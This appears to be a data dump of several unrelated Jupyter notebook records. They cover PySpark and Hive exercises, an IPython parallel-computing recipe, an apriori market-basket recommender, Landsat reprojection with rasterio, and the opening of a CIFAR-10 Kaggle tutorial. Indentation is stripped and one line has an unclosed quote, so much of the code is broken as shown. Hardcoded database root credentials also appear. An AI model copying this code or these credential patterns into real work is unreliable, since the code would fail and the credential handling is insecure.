from datetime import datetime
def parse_date(s):
return datetime.strptime(s[:10], "%m/%d/%Y").date()
parse_date("04/20/2005 12:00:00 AM")
from pyspark.sql.types import DateType
spark.udf.register("parse_date", parse_date, DateType())
sfpd.select(expr("date"), expr("parse_date(`date`)")).show(10, False)
sfpd_clean = sfpd.withColumn("date", expr("parse_date(date)"))
sfpd_clean.limit(10).toPandas()
```
# Caveat
In the above example you used an UDF written in python. Python UDF make run data frame operations run significant slowly compared to UDF's writted in Scala or Java. However, it is just safe to use the built-in UDF or invoking UDF's written in Scala or Java. For the above exercise, there is already an built-in UDF defined called to_timestamp. Find out the details in the Spark API doc.
### Exercise 5: This exercise is to explore data partitioning for file. Data partitions are different from RDD partitions. For this exercise use weblogs dataset.
1. Create a hive table - weblgos using weblogs dataset. Follow the steps mention in this doc. http://blog.einext.com/hadoop/hive-table-using-regex-serde
2. Create a dataframe in Spark that refers to Hive table weblogs.
3. Find total number of rows.
4. Parse the time column as date time
5. Save the weblogs data with partitioned by year and month based on the time field that you parsed in step #4
6. Reload the partitioned dataset and verify the number of record maches with the original.
You can upload weblogs to the HDFS and create a hive table by running the following hive table create command.
```
CREATE EXTERNAL TABLE `weblogs`(
`host` string COMMENT 'Host',
`identity` string COMMENT 'User Identity',
`user` string COMMENT 'User identifier',
`time` string COMMENT 'Date time of access',
`request` string COMMENT 'Http request',
`status` string COMMENT 'Http status',
`size` string COMMENT 'Http response size',
`referrer` string COMMENT 'Referrer url',
`useragent` string COMMENT 'Web client agent')
ROW FORMAT SERDE
'org.apache.hadoop.hive.serde2.RegexSerDe'
WITH SERDEPROPERTIES (
'input.regex'='(\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})? (\\S+) (\\S+) (\\[.+?\\]) \"(.*?)\" (\\d{3}) (\\S+) \"(.*?)\" \"(.*?)\"',
'output.format.string'='%1$s %2$s %3$s %4$s %5$s %6$s %7$s %8$s %9$s')
STORED AS INPUTFORMAT
'org.apache.hadoop.mapred.TextInputFormat'
OUTPUTFORMAT
'org.apache.hadoop.hive.ql.io.HiveIgnoreKeyTextOutputFormat'
LOCATION
'/user/cloudera/weblogs';
```
Create a dataframe in Spark that refers to Hive table weblogs.
```
sql("show tables").show()
weblogs = spark.table("weblogs")
weblogs.limit(10).toPandas()
```
Find total number of rows.
```
weblogs.count()
```
Parse the time column as date time
```
weblogs_clean = weblogs.withColumn("time_clean", expr(r"from_unixtime(UNIX_TIMESTAMP(TIME, '[dd/MMM/yyyy:HH:mm:ss Z]'))"))
weblogs_clean.select("time", "time_clean").show(10, False)
```
Save the weblogs data with partitioned by year and month based on the time field that you parsed in previous step
```
(weblogs_clean
.withColumn("year", expr("year(time_clean)"))
.withColumn("month", expr("month(time_clean)"))
.write
.mode("overwrite")
.partitionBy("year", "month")
.save("weblogs-partitioned"))
```
Reload the partitioned dataset and verify the number of record maches with the original.
```
weblogs_partitioned = spark.read.load("weblogs-partitioned")
weblogs_partitioned.printSchema()
weblogs_partitioned.count()
```
### Exercise 6: Convert RDD to Dataframe
There are a couple of ways to conver the RDD into a dataframe.
A. Supply the schema defined using StructType object
B. Infer the schema
```
from random import random
rdd = sc.parallelize([random() for _ in range(10)])
rdd.collect()
from pyspark.sql import Row
rddRow = rdd.map(lambda f: Row(f))
spark.createDataFrame(rddRow).toDF("col1").show()
rddRow = rdd.map(lambda f: Row(col1 = f))
df = spark.createDataFrame(rddRow)
df.show()
```
#### Supply schema while converting the rdd into a dataframe
By default, spark will try to infer the column names and a types by sampling the row object RDD. To control this process you can supply the schema programmaitcally as well.
```
# Schema created by schema inferencing
rdd = sc.parallelize([
Row(c1 = 1.0, c2 = None, c3 = None),
Row(c1 = None, c2= "Apple", c3 = None)])
df = spark.createDataFrame(rdd, samplingRatio=1.0) # samplingRatio = 1 forces to see all records
df.printSchema()
```
Now, suppose you already know the schema of the record - it should be three columns. C1, C2 and C3 of float, string and date types respectively.
```
from pyspark.sql.types import *
schema = StructType([
StructField("c1", FloatType()),
StructField("c2", StringType()),
StructField("c3", DateType()),
])
df = spark.createDataFrame(rdd, schema)
df.printSchema()
df.show()
moviesRdd = sc.textFile("movielens/movies.csv")
moviesRdd.take(10)
moviesRdd.filter(lambda line: len(line.split(",")) != 3).take(10)
from io import StringIO
import csv
from pyspark.sql.types import Row
def parse_movie(line):
tokens = [v for v in csv.reader(StringIO(line), delimiter=',')][0]
fields = tuple(tokens)
return Row(*tokens)
moviesCleanRdd = (moviesRdd
.filter(lambda line: not line.startswith("movieId"))
.map(parse_movie)
)
df = moviesCleanRdd.toDF().toDF("movieId", "title", "genre")
df.show(10, False)
schema = StructType([
StructField("movieId", StringType()),
StructField("title", StringType()),
StructField("genres", StringType()),
])
spark.createDataFrame(moviesCleanRdd, schema).show(10, False)
```
# Exercise 7: Data format
Save stocks.csv dataset in the following formats and compare the size on disk
A. csv
B. Json
C. Parquet
```
stocks = (spark
.read
.option("header", True)
.option("inferSchema", True)
.csv("stocks"))
!hadoop fs -ls -h stocks
(stocks
.write
.format("csv")
.option("compression", "gzip")
.option("header", True)
.save("stocks.csv.gz"))
!hadoop fs -ls -h stocks.csv.gz
```
Save in json format
```
stocks.write.format("json").save("stocks.json")
!hadoop fs -ls -h stocks.json
```
Save in parquet format
```
stocks.write.format("parquet").save("stocks.parquet")
!hadoop fs -ls -h stocks.parquet
```
Observations
- CSV file format: 121 MB
- CSV gzip compressed: 45.3 MB
- Json uncompressed: 279.5 MB
- Parquet snappy compressed: 40 MB
# Exercise 8: Size of dataframe in cache
Cache the stocks.csv in RDD format and do the same in Dataframe format and compare the memory utilization.
```
stocksRdd = sc.textFile("stocks")
stocksRdd.cache().count()
```
Check the storage table in Spark Web UI. You can find Spark Web UI as below.
```
sc.uiWebUrl
stocksDf = spark.read.option("header", True).option("inferSchema", True).csv("stocks")
stocksDf.cache()
stocksDf.count()
```
|
github_jupyter
|
spark.version
from pyspark.sql.functions import *
home_dir = "/user/cloudera/movielens/"
movies = (spark.read.format("csv")
.options(header = True, inferSchema = True)
.load(home_dir + "movies.csv")
.cache()) # Keep the dataframe in memory for faster processing
movies.printSchema()
movies.dtypes
movies.show(5)
movies.count()
ratings = (spark.read.format("csv")
.options(header = True, inferSchema = True)
.load(home_dir + "ratings.csv")
.persist())
ratings.printSchema()
ratings.show(5)
ratings.count()
ratings.groupBy("movieId", "userId").count().filter("count != 1").show()
ratings_agg = (ratings
.groupBy(col("movieId"))
.agg(
count(col("movieId")).alias("count"),
avg(col("rating")).alias("avg_rating")
))
ratings_agg.show()
(ratings_agg
.alias("t1")
.join(movies.alias("t2"), col("t1.movieId") == col("t2.movieId"))
.filter("count > 100")
.orderBy(desc("avg_rating"))
.select("t1.movieId", "title", "avg_rating", "count")
.limit(10)
.show())
sql("show tables").show()
movies.createOrReplaceTempView("movies")
ratings.createOrReplaceTempView("ratings")
sql("show tables").show()
sql("""
select
t1.movieId,
t1.title,
avg(t2.rating) avg_rating,
count(1) rating_count
from movies t1 join ratings t2 on t1.movieId = t2.movieId
group by t1.movieId, t1.title
having rating_count >= 100
order by avg_rating desc
limit 10
""").show()
genre_avg_rating = (ratings.alias("t1")
.join(movies.alias("t2"), col("t1.movieId") == col("t2.movieId"))
.select(col("rating"), explode(split("genres", r"\|")).alias("genre"))
.groupBy(col("genre"))
.agg(count(col("genre")).alias("count"), avg("rating").alias("avg_rating"))
.orderBy(desc("avg_rating")))
genre_avg_rating.show()
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
%matplotlib inline
df = genre_avg_rating.toPandas()
df.head()
df.plot("genre", "avg_rating", "bar", title = "Barplot of avg rating by genre")
stocks = (spark
.read
.format("csv")
.options(inferSchema = True, header = True)
.load("stocks")
.cache())
stocks.show()
stocks.printSchema()
stocks.withColumn("date", col("date").cast("date")).printSchema()
stocks = stocks.withColumn("date", col("date").cast("date"))
stocks.show()
stocks.orderBy(col("date").desc()).show(1)
stocks.createOrReplaceTempView("stocks")
stocks_last10 = sql("""
select
cast(t1.date as string),
t1.symbol,
t1.adjclose,
t1.row_num
from (select
*,
row_number() over (partition by symbol order by date desc) row_num
from stocks) t1 where t1.row_num <= 11
""")
stocks_last10.show()
stocks_pivot = stocks_last10.groupby("symbol").pivot("date").agg(max(col("adjclose")))
stocks_pivot.limit(10).toPandas()
columns = ["v" + str(i) for i in range(len(stocks_pivot.columns) - 1)]
columns.insert(0, "symbol")
columns
stocks_pivot = stocks_pivot.toDF(*columns)
stocks_pivot.limit(10).toPandas()
stocks_diff = stocks_pivot
for i in range(1, len(stocks_diff.columns) - 1):
stocks_diff = stocks_diff.withColumn(columns[i], col(columns[i]) - col(columns[i+1]))
stocks_diff = stocks_diff.drop(stocks_diff.columns[-1])
stocks_diff.limit(10).toPandas()
orders = (spark
.read
.format("jdbc")
.option("url", "jdbc:mysql://localhost/retail_db")
.option("driver", "com.mysql.jdbc.Driver")
.option("dbtable", "orders")
.option("user", "root")
.option("password", "cloudera")
.load())
orders.show()
orders.write.format("parquet").mode("overwrite").save("orders")
customers = (spark
.read
.format("jdbc")
.option("url", "jdbc:mysql://localhost/retail_db")
.option("driver", "com.mysql.jdbc.Driver")
.option("dbtable", "customers")
.option("user", "root")
.option("password", "cloudera")
.load())
customers.show(5)
orders = spark.read.load("orders")
orders.show(6)
(orders.alias("t1")
.join(customers.alias("t2"), col("t1.order_customer_id") == col("t2.customer_id"))
.filter("t1.order_status == 'COMPLETE'")
.groupby("order_customer_id", "customer_fname", "customer_lname")
.count()
.orderBy(col("count").desc())
.show(10))
orders.write.mode("overwrite").saveAsTable("orders")
sql("show tables").show()
spark.table("orders").show(10)
sql("describe formatted orders").toPandas()
sql("drop table orders").show()
sfpd = (spark
.read
.format("csv")
.option("header", True)
.option("inferSchema", True)
.load("sfpd")
)
sfpd.printSchema()
sfpd.limit(5).toPandas() # Using pandas dataframe only for better tabular
sfpd.rdd.getNumPartitions()
type(sfpd.first())
categories = sfpd.select("Category").distinct().rdd.map(lambda r: r.Category)
print(categories.collect())
categories_count = categories.count()
categories_count
category_counts = sfpd.groupBy("Category").count().orderBy(col("count").desc())
category_counts.show(categories_count, False)
category_counts.toPandas().set_index("Category").plot.barh(figsize = (10, 15))
sfpd.select("date").show(10, False)
from datetime import datetime
s = "04/20/2005 12:00:00 AM"
d = datetime.strptime(s[:10], "%m/%d/%Y").date()
d
from datetime import datetime
def parse_date(s):
return datetime.strptime(s[:10], "%m/%d/%Y").date()
parse_date("04/20/2005 12:00:00 AM")
from pyspark.sql.types import DateType
spark.udf.register("parse_date", parse_date, DateType())
sfpd.select(expr("date"), expr("parse_date(`date`)")).show(10, False)
sfpd_clean = sfpd.withColumn("date", expr("parse_date(date)"))
sfpd_clean.limit(10).toPandas()
CREATE EXTERNAL TABLE `weblogs`(
`host` string COMMENT 'Host',
`identity` string COMMENT 'User Identity',
`user` string COMMENT 'User identifier',
`time` string COMMENT 'Date time of access',
`request` string COMMENT 'Http request',
`status` string COMMENT 'Http status',
`size` string COMMENT 'Http response size',
`referrer` string COMMENT 'Referrer url',
`useragent` string COMMENT 'Web client agent')
ROW FORMAT SERDE
'org.apache.hadoop.hive.serde2.RegexSerDe'
WITH SERDEPROPERTIES (
'input.regex'='(\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})? (\\S+) (\\S+) (\\[.+?\\]) \"(.*?)\" (\\d{3}) (\\S+) \"(.*?)\" \"(.*?)\"',
'output.format.string'='%1$s %2$s %3$s %4$s %5$s %6$s %7$s %8$s %9$s')
STORED AS INPUTFORMAT
'org.apache.hadoop.mapred.TextInputFormat'
OUTPUTFORMAT
'org.apache.hadoop.hive.ql.io.HiveIgnoreKeyTextOutputFormat'
LOCATION
'/user/cloudera/weblogs';
sql("show tables").show()
weblogs = spark.table("weblogs")
weblogs.limit(10).toPandas()
weblogs.count()
weblogs_clean = weblogs.withColumn("time_clean", expr(r"from_unixtime(UNIX_TIMESTAMP(TIME, '[dd/MMM/yyyy:HH:mm:ss Z]'))"))
weblogs_clean.select("time", "time_clean").show(10, False)
(weblogs_clean
.withColumn("year", expr("year(time_clean)"))
.withColumn("month", expr("month(time_clean)"))
.write
.mode("overwrite")
.partitionBy("year", "month")
.save("weblogs-partitioned"))
weblogs_partitioned = spark.read.load("weblogs-partitioned")
weblogs_partitioned.printSchema()
weblogs_partitioned.count()
from random import random
rdd = sc.parallelize([random() for _ in range(10)])
rdd.collect()
from pyspark.sql import Row
rddRow = rdd.map(lambda f: Row(f))
spark.createDataFrame(rddRow).toDF("col1").show()
rddRow = rdd.map(lambda f: Row(col1 = f))
df = spark.createDataFrame(rddRow)
df.show()
# Schema created by schema inferencing
rdd = sc.parallelize([
Row(c1 = 1.0, c2 = None, c3 = None),
Row(c1 = None, c2= "Apple", c3 = None)])
df = spark.createDataFrame(rdd, samplingRatio=1.0) # samplingRatio = 1 forces to see all records
df.printSchema()
from pyspark.sql.types import *
schema = StructType([
StructField("c1", FloatType()),
StructField("c2", StringType()),
StructField("c3", DateType()),
])
df = spark.createDataFrame(rdd, schema)
df.printSchema()
df.show()
moviesRdd = sc.textFile("movielens/movies.csv")
moviesRdd.take(10)
moviesRdd.filter(lambda line: len(line.split(",")) != 3).take(10)
from io import StringIO
import csv
from pyspark.sql.types import Row
def parse_movie(line):
tokens = [v for v in csv.reader(StringIO(line), delimiter=',')][0]
fields = tuple(tokens)
return Row(*tokens)
moviesCleanRdd = (moviesRdd
.filter(lambda line: not line.startswith("movieId"))
.map(parse_movie)
)
df = moviesCleanRdd.toDF().toDF("movieId", "title", "genre")
df.show(10, False)
schema = StructType([
StructField("movieId", StringType()),
StructField("title", StringType()),
StructField("genres", StringType()),
])
spark.createDataFrame(moviesCleanRdd, schema).show(10, False)
stocks = (spark
.read
.option("header", True)
.option("inferSchema", True)
.csv("stocks"))
!hadoop fs -ls -h stocks
(stocks
.write
.format("csv")
.option("compression", "gzip")
.option("header", True)
.save("stocks.csv.gz"))
!hadoop fs -ls -h stocks.csv.gz
stocks.write.format("json").save("stocks.json")
!hadoop fs -ls -h stocks.json
stocks.write.format("parquet").save("stocks.parquet")
!hadoop fs -ls -h stocks.parquet
stocksRdd = sc.textFile("stocks")
stocksRdd.cache().count()
sc.uiWebUrl
stocksDf = spark.read.option("header", True).option("inferSchema", True).csv("stocks")
stocksDf.cache()
stocksDf.count()
| 0.45302 | 0.981788 |
> This is one of the 100 recipes of the [IPython Cookbook](http://ipython-books.github.io/), the definitive guide to high-performance scientific computing and data science in Python.
# 5.10. Interacting with asynchronous parallel tasks in IPython
You need to start IPython engines (see previous recipe). The simplest option is to launch them from the *Clusters* tab in the notebook dashboard. In this recipe, we use four engines.
1. Let's import a few modules.
```
import time
import sys
from IPython import parallel
from IPython.display import clear_output, display
from IPython.html import widgets
```
2. We create a Client.
```
rc = parallel.Client()
```
3. Now, we create a load balanced view on the IPython engines.
```
view = rc.load_balanced_view()
```
4. We define a simple function for our parallel tasks.
```
def f(x):
import time
time.sleep(.1)
return x*x
```
5. We will run this function on 100 integer numbers in parallel.
```
numbers = list(range(100))
```
6. We execute `f` on our list `numbers` in parallel across all of our engines, using `map_async()`. This function returns immediately an `AsyncResult` object. This object allows us to retrieve interactively information about the tasks.
```
ar = view.map_async(f, numbers)
```
7. This object has a `metadata` attribute, a list of dictionaries for all engines. We can get the date of submission and completion, the status, the standard output and error, and other information.
```
ar.metadata[0]
```
8. Iterating over the `AsyncResult` instance works normally; the iteration progresses in real-time while the tasks are being completed.
```
for _ in ar:
print(_, end=', ')
```
9. Now, we create a simple progress bar for our asynchronous tasks. The idea is to create a loop polling for the tasks' status at every second. An `IntProgressWidget` widget is updated in real-time and shows the progress of the tasks.
```
def progress_bar(ar):
# We create a progress bar.
w = widgets.IntProgressWidget()
# The maximum value is the number of tasks.
w.max = len(ar.msg_ids)
# We display the widget in the output area.
display(w)
# Repeat every second:
while not ar.ready():
# Update the widget's value with the
# number of tasks that have finished
# so far.
w.value = ar.progress
time.sleep(1)
w.value = w.max
ar = view.map_async(f, numbers)
progress_bar(ar)
```
10. Finally, it is easy to debug a parallel task on an engine. We can launch a Qt client on the remote kernel by calling `%qtconsole` within a `%%px` cell magic.
```
%%px -t 0
%qtconsole
```
The Qt console allows us to inspect the remote namespace for debugging or analysis purposes.
> You'll find all the explanations, figures, references, and much more in the book (to be released later this summer).
> [IPython Cookbook](http://ipython-books.github.io/), by [Cyrille Rossant](http://cyrille.rossant.net), Packt Publishing, 2014 (500 pages).
|
github_jupyter
|
import time
import sys
from IPython import parallel
from IPython.display import clear_output, display
from IPython.html import widgets
rc = parallel.Client()
view = rc.load_balanced_view()
def f(x):
import time
time.sleep(.1)
return x*x
numbers = list(range(100))
ar = view.map_async(f, numbers)
ar.metadata[0]
for _ in ar:
print(_, end=', ')
def progress_bar(ar):
# We create a progress bar.
w = widgets.IntProgressWidget()
# The maximum value is the number of tasks.
w.max = len(ar.msg_ids)
# We display the widget in the output area.
display(w)
# Repeat every second:
while not ar.ready():
# Update the widget's value with the
# number of tasks that have finished
# so far.
w.value = ar.progress
time.sleep(1)
w.value = w.max
ar = view.map_async(f, numbers)
progress_bar(ar)
%%px -t 0
%qtconsole
| 0.23634 | 0.960584 |
```
import os
project_name = "reco-tut-mba"; branch = "main"; account = "sparsh-ai"
project_path = os.path.join('/content', project_name)
if not os.path.exists(project_path):
!cp /content/drive/MyDrive/mykeys.py /content
import mykeys
!rm /content/mykeys.py
path = "/content/" + project_name;
!mkdir "{path}"
%cd "{path}"
import sys; sys.path.append(path)
!git config --global user.email "[email protected]"
!git config --global user.name "reco-tut"
!git init
!git remote add origin https://"{mykeys.git_token}":[email protected]/"{account}"/"{project_name}".git
!git pull origin "{branch}"
!git checkout main
else:
%cd "{project_path}"
import sys
sys.path.insert(0,'./code')
import numpy as np
import pandas as pd
# local modules
from apriori import apriori
df = pd.read_csv('./data/grocery.csv', header=None)
df.head(2)
df.shape
!head -20 ./data/grocery.csv
transactions = []
list_of_products=[]
basket=[]
totalcol = df.shape[1]
for i in range(0, len(df)):
cart = []
for j in range(0,totalcol):
if str(df.values[i,j] ) != "nan":
cart.append(str(df.values[i,j]))
if str(df.values[i,j]) not in list_of_products:
list_of_products.append(str(df.values[i,j]))
transactions.append(cart)
', '.join(list_of_products)
[', '.join(x) for x in transactions[:10]]
rules = apriori(transactions, min_support = 0.003, min_confidence = 0.04, min_lift = 3)
results = list(rules)
results
def recommendation(basket):
recommendations=[]
prints = []
for item in results:
pair = item[0]
items = [x for x in pair]
for product in basket:
if items[0]==product:
prints.append('Rule: {} -> {}'.format(items[0],items[1]))
prints.append('Support: {}'.format(item[1]))
prints.append('Confidence: {}'.format(str(item[2][0][2])))
prints.append('{}'.format('-'*50))
if items[1] not in recommendations:
recommendations.append(items[1])
return recommendations, prints
def recommend_randomly(nrec=2):
count = 0
while True:
basket = np.random.choice(list_of_products,5)
recs, prints = recommendation(basket)
if recs:
count+=1
print('\n{}\n'.format('='*100))
print('Basket:\n\t{}'.format('\n\t'.join(list(basket))))
print('\nRecommendation:\n\t{}'.format('\n\t'.join(list(recs))))
print('\n{}\n'.format('='*100))
print('\n'.join(prints))
if count>=nrec:
break
recommend_randomly()
!git status
!git add . && git commit -m 'commit' && git push origin main
!git push origin main
%%writefile README.md
# reco-tut-mba
This repository contains tutorials related to Market Basket Analysis for Recommenders.
```
|
github_jupyter
|
import os
project_name = "reco-tut-mba"; branch = "main"; account = "sparsh-ai"
project_path = os.path.join('/content', project_name)
if not os.path.exists(project_path):
!cp /content/drive/MyDrive/mykeys.py /content
import mykeys
!rm /content/mykeys.py
path = "/content/" + project_name;
!mkdir "{path}"
%cd "{path}"
import sys; sys.path.append(path)
!git config --global user.email "[email protected]"
!git config --global user.name "reco-tut"
!git init
!git remote add origin https://"{mykeys.git_token}":[email protected]/"{account}"/"{project_name}".git
!git pull origin "{branch}"
!git checkout main
else:
%cd "{project_path}"
import sys
sys.path.insert(0,'./code')
import numpy as np
import pandas as pd
# local modules
from apriori import apriori
df = pd.read_csv('./data/grocery.csv', header=None)
df.head(2)
df.shape
!head -20 ./data/grocery.csv
transactions = []
list_of_products=[]
basket=[]
totalcol = df.shape[1]
for i in range(0, len(df)):
cart = []
for j in range(0,totalcol):
if str(df.values[i,j] ) != "nan":
cart.append(str(df.values[i,j]))
if str(df.values[i,j]) not in list_of_products:
list_of_products.append(str(df.values[i,j]))
transactions.append(cart)
', '.join(list_of_products)
[', '.join(x) for x in transactions[:10]]
rules = apriori(transactions, min_support = 0.003, min_confidence = 0.04, min_lift = 3)
results = list(rules)
results
def recommendation(basket):
recommendations=[]
prints = []
for item in results:
pair = item[0]
items = [x for x in pair]
for product in basket:
if items[0]==product:
prints.append('Rule: {} -> {}'.format(items[0],items[1]))
prints.append('Support: {}'.format(item[1]))
prints.append('Confidence: {}'.format(str(item[2][0][2])))
prints.append('{}'.format('-'*50))
if items[1] not in recommendations:
recommendations.append(items[1])
return recommendations, prints
def recommend_randomly(nrec=2):
count = 0
while True:
basket = np.random.choice(list_of_products,5)
recs, prints = recommendation(basket)
if recs:
count+=1
print('\n{}\n'.format('='*100))
print('Basket:\n\t{}'.format('\n\t'.join(list(basket))))
print('\nRecommendation:\n\t{}'.format('\n\t'.join(list(recs))))
print('\n{}\n'.format('='*100))
print('\n'.join(prints))
if count>=nrec:
break
recommend_randomly()
!git status
!git add . && git commit -m 'commit' && git push origin main
!git push origin main
%%writefile README.md
# reco-tut-mba
This repository contains tutorials related to Market Basket Analysis for Recommenders.
| 0.069431 | 0.109563 |
```
!pip install rasterio
import rasterio
from matplotlib import pyplot as plt
url = r'https://s3-us-west-2.amazonaws.com/landsat-pds/c1/L8/009/029/LC08_L1TP_009029_20210111_20210111_01_RT/LC08_L1TP_009029_20210111_20210111_01_RT_B2.TIF'
src = rasterio.open(url)
print(src.crs)
print(src.crs.wkt)
print(src.transform)
plt.imshow(src.read(1)[::4,::4],vmin=-10)
plt.show()
import numpy as np
import rasterio
from rasterio.warp import calculate_default_transform, reproject, Resampling
# dst_crs = 'EPSG:4326'
dst_crs = 'EPSG:3857' # web mercator
with rasterio.open(url) as src:
transform, width, height = calculate_default_transform(
src.crs, dst_crs, src.width, src.height, *src.bounds)
kwargs = src.meta.copy()
kwargs.update({
'crs': dst_crs,
'transform': transform,
'width': width,
'height': height
})
with rasterio.open('testLandsat.tif', 'w', **kwargs) as dst:
for i in range(1, src.count + 1):
reproject(
source=rasterio.band(src, i),
destination=rasterio.band(dst, i),
src_transform=src.transform,
src_crs=src.crs,
dst_transform=transform,
dst_crs=dst_crs,
resampling=Resampling.nearest)
src = rasterio.open('testLandsat.tif')
print(src.crs)
print(src.crs.wkt)
print(src.transform)
plt.imshow(src.read(1)[::4,::4],vmin=-10)
plt.show()
#the below landsat image has been reprojected to web mercator!
pip install -U rio-tiler
from rio_tiler.io import COGReader
with COGReader("testLandsat.tif") as image:
# img = image.tile(0, 0, 0)
img = image.tile(326, 368, 10) # read mercator tile z-x-y
# img = image.part(bbox) # read the data intersecting a bounding box
# img = image.feature(geojson_feature) # read the data intersecting a geojson feature
# img = image.point(lon,lat)
plt.imshow(img.data[0,:,:])
plt.show()
# the below is a landsat image in web mercator snapped to a slippy tile!
```
### The following are notes and chaos
```
!pip install pyproj
from pyproj import Transformer
dst_crs = 'EPSG:3857' # web mercator
from_crs = 'EPSG:4326' # wgs84
from_crs = 'EPSG:32620 #WGS 84 / UTM zone 20N
transformer = Transformer.from_crs(from_crs, dst_crs, always_xy=True)
transformer.transform(-80, 50)
# (571666.4475041276, 5539109.815175673)
src.bounds
src.crs
import math
def tile_from_coords(lat, lon, zoom):
lat_rad = math.radians(lat)
n = 2.0 ** zoom
tile_x = int((lon + 180.0) / 360.0 * n)
tile_y = int((1.0 - math.asinh(math.tan(lat_rad)) / math.pi) / 2.0 * n)
return [tile_x, tile_y, zoom]
tile_from_coords(44.88,-65.16,10)
src2 = rasterio.open(url)
print(src2.crs)
print(src2.crs.wkt)
print(src2.transform)
plt.imshow(src2.read(1)[::4,::4],vmin=-10)
plt.show()
img2 = src2.read(1)
img2.shape
len(img2.shape)
def image_from_features(features, width):
length,depth = features.shape
height = int(length/width)
img = features.reshape(width,height,depth)
return img
def features_from_image(img):
if len(img.shape)==2:
features = img.flatten()
else:
features = img.reshape(-1, img.shape[2])
return features
feat2 = features_from_image(img2)
xImg = np.zeros(img2.shape)
yImg = np.zeros(img2.shape)
src2.bounds.left
xvals = np.linspace(start=src2.bounds.left, stop=src2.bounds.right, num=img2.shape[1], endpoint=True, retstep=False, dtype=None, axis=0)
yvals = np.linspace(start=src2.bounds.bottom, stop=src2.bounds.top, num=img2.shape[0], endpoint=True, retstep=False, dtype=None, axis=0)
xygrid = np.meshgrid(xvals, yvals)
scale = lambda x: src2.bounds.left+x*3
scale(xImg)
xImg2 = np.tile(xvals,(img2.shape))
# https://trac.osgeo.org/gdal/wiki/CloudOptimizedGeoTIFF
cogurl = r'http://even.rouault.free.fr/gtiff_test/S2A_MSIL1C_20170102T111442_N0204_R137_T30TXT_20170102T111441_TCI_cloudoptimized_2.tif'
src3 = rasterio.open(cogurl)
plt.imshow(src3.read(1)[::4,::4],vmin=-10)
plt.show()
```
|
github_jupyter
|
!pip install rasterio
import rasterio
from matplotlib import pyplot as plt
url = r'https://s3-us-west-2.amazonaws.com/landsat-pds/c1/L8/009/029/LC08_L1TP_009029_20210111_20210111_01_RT/LC08_L1TP_009029_20210111_20210111_01_RT_B2.TIF'
src = rasterio.open(url)
print(src.crs)
print(src.crs.wkt)
print(src.transform)
plt.imshow(src.read(1)[::4,::4],vmin=-10)
plt.show()
import numpy as np
import rasterio
from rasterio.warp import calculate_default_transform, reproject, Resampling
# dst_crs = 'EPSG:4326'
dst_crs = 'EPSG:3857' # web mercator
with rasterio.open(url) as src:
transform, width, height = calculate_default_transform(
src.crs, dst_crs, src.width, src.height, *src.bounds)
kwargs = src.meta.copy()
kwargs.update({
'crs': dst_crs,
'transform': transform,
'width': width,
'height': height
})
with rasterio.open('testLandsat.tif', 'w', **kwargs) as dst:
for i in range(1, src.count + 1):
reproject(
source=rasterio.band(src, i),
destination=rasterio.band(dst, i),
src_transform=src.transform,
src_crs=src.crs,
dst_transform=transform,
dst_crs=dst_crs,
resampling=Resampling.nearest)
src = rasterio.open('testLandsat.tif')
print(src.crs)
print(src.crs.wkt)
print(src.transform)
plt.imshow(src.read(1)[::4,::4],vmin=-10)
plt.show()
#the below landsat image has been reprojected to web mercator!
pip install -U rio-tiler
from rio_tiler.io import COGReader
with COGReader("testLandsat.tif") as image:
# img = image.tile(0, 0, 0)
img = image.tile(326, 368, 10) # read mercator tile z-x-y
# img = image.part(bbox) # read the data intersecting a bounding box
# img = image.feature(geojson_feature) # read the data intersecting a geojson feature
# img = image.point(lon,lat)
plt.imshow(img.data[0,:,:])
plt.show()
# the below is a landsat image in web mercator snapped to a slippy tile!
!pip install pyproj
from pyproj import Transformer
dst_crs = 'EPSG:3857' # web mercator
from_crs = 'EPSG:4326' # wgs84
from_crs = 'EPSG:32620 #WGS 84 / UTM zone 20N
transformer = Transformer.from_crs(from_crs, dst_crs, always_xy=True)
transformer.transform(-80, 50)
# (571666.4475041276, 5539109.815175673)
src.bounds
src.crs
import math
def tile_from_coords(lat, lon, zoom):
lat_rad = math.radians(lat)
n = 2.0 ** zoom
tile_x = int((lon + 180.0) / 360.0 * n)
tile_y = int((1.0 - math.asinh(math.tan(lat_rad)) / math.pi) / 2.0 * n)
return [tile_x, tile_y, zoom]
tile_from_coords(44.88,-65.16,10)
src2 = rasterio.open(url)
print(src2.crs)
print(src2.crs.wkt)
print(src2.transform)
plt.imshow(src2.read(1)[::4,::4],vmin=-10)
plt.show()
img2 = src2.read(1)
img2.shape
len(img2.shape)
def image_from_features(features, width):
length,depth = features.shape
height = int(length/width)
img = features.reshape(width,height,depth)
return img
def features_from_image(img):
if len(img.shape)==2:
features = img.flatten()
else:
features = img.reshape(-1, img.shape[2])
return features
feat2 = features_from_image(img2)
xImg = np.zeros(img2.shape)
yImg = np.zeros(img2.shape)
src2.bounds.left
xvals = np.linspace(start=src2.bounds.left, stop=src2.bounds.right, num=img2.shape[1], endpoint=True, retstep=False, dtype=None, axis=0)
yvals = np.linspace(start=src2.bounds.bottom, stop=src2.bounds.top, num=img2.shape[0], endpoint=True, retstep=False, dtype=None, axis=0)
xygrid = np.meshgrid(xvals, yvals)
scale = lambda x: src2.bounds.left+x*3
scale(xImg)
xImg2 = np.tile(xvals,(img2.shape))
# https://trac.osgeo.org/gdal/wiki/CloudOptimizedGeoTIFF
cogurl = r'http://even.rouault.free.fr/gtiff_test/S2A_MSIL1C_20170102T111442_N0204_R137_T30TXT_20170102T111441_TCI_cloudoptimized_2.tif'
src3 = rasterio.open(cogurl)
plt.imshow(src3.read(1)[::4,::4],vmin=-10)
plt.show()
| 0.585575 | 0.572065 |
# Image Classification (CIFAR-10) on Kaggle
:label:`sec_kaggle_cifar10`
So far, we have been using Gluon's `data` package to directly obtain image datasets in the tensor format. In practice, however, image datasets often exist in the format of image files. In this section, we will start with the original image files and organize, read, and convert the files to the tensor format step by step.
We performed an experiment on the CIFAR-10 dataset in :numref:`sec_image_augmentation`.
This is an important data
set in the computer vision field. Now, we will apply the knowledge we learned in
the previous sections in order to participate in the Kaggle competition, which
addresses CIFAR-10 image classification problems. The competition's web address
is
> https://www.kaggle.com/c/cifar-10
:numref:`fig_kaggle_cifar10` shows the information on the competition's webpage. In order to submit the results, please register an account on the Kaggle website first.

:width:`600px`
:label:`fig_kaggle_cifar10`
First, import the packages or modules required for the competition.
```
import collections
from d2l import torch as d2l
import math
import torch
import torchvision
